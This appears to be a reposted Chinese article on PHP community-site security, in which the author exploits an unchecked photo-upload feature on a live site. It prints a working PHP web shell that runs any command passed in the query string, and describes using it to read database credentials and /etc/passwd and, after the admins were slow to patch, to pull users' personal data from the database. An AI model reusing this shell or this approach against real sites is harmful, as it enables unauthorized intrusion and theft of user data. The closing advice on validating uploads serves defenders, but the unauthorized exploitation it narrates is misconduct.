关于php做社区网站的安全性-PHP安全-PHP教程-幽默笑话

173浏览

关于php做社区网站的安全性-PHP安全-PHP教程-幽默笑话

文章内容关于php做社区网站的安全性修改时间:[2010/11/0400:35]阅读次数:[820]发表者:[起缘]目前,我发现某个社区网站中的一个上传我的照片功能有着很大的安全隐患,因为上传程序未对上传的文件做分析,从而我可以上传一个的文件,然后服务器上的名字就为.php(为数字),  我的PHP内容如下:lt;$dbs=mysql_connect($strDBHost,$strDBUser,$strDBPassword);……mysql_close($dbs);gt;  当然……中我只作了个测试,没有真正使用数据库,但是我以另一个PHP,.php,内容如下:lt;$query=getenv(quot;QUERY_STRINGquot;);$command=urldecode($query);$stdout=system(quot;$commandquot;);echoquot;$stdoutquot;;gt;成功的取得$strDBHost=quot;...quot;;$strDBPassword=quot;quot;;$strDBUser=quot;rootquot;;并连上数据库  然后用后一个PHP把上传的PHP命名为和  成功取得/ETC/PASSWD和该网站的首页面源码。

  然后我发信警告网管,但是他们在第一天没及时修补漏洞,于是我对数据库进行分析,并上传了个,成功的得到数据库内的用户信息。

  今天他们采取的修补手段是把那个可以上传的目录移去,不过这将导致用户暂时不能浏览、上传照片。

  所以进行此类设计时,应该考虑到恶意用户通过直接调用url,把恶意数据传个程序,而不能以为网页在服务器端就安全了!原作者:天极网来源:http:///。

您现在的位置:情感 > 情感电台

上一篇:欢乐颂2第21、22集预告 包母和安迪上演婆媳大战我对足球的认识作文

下一篇:没有了

你可能喜欢的:
友情链接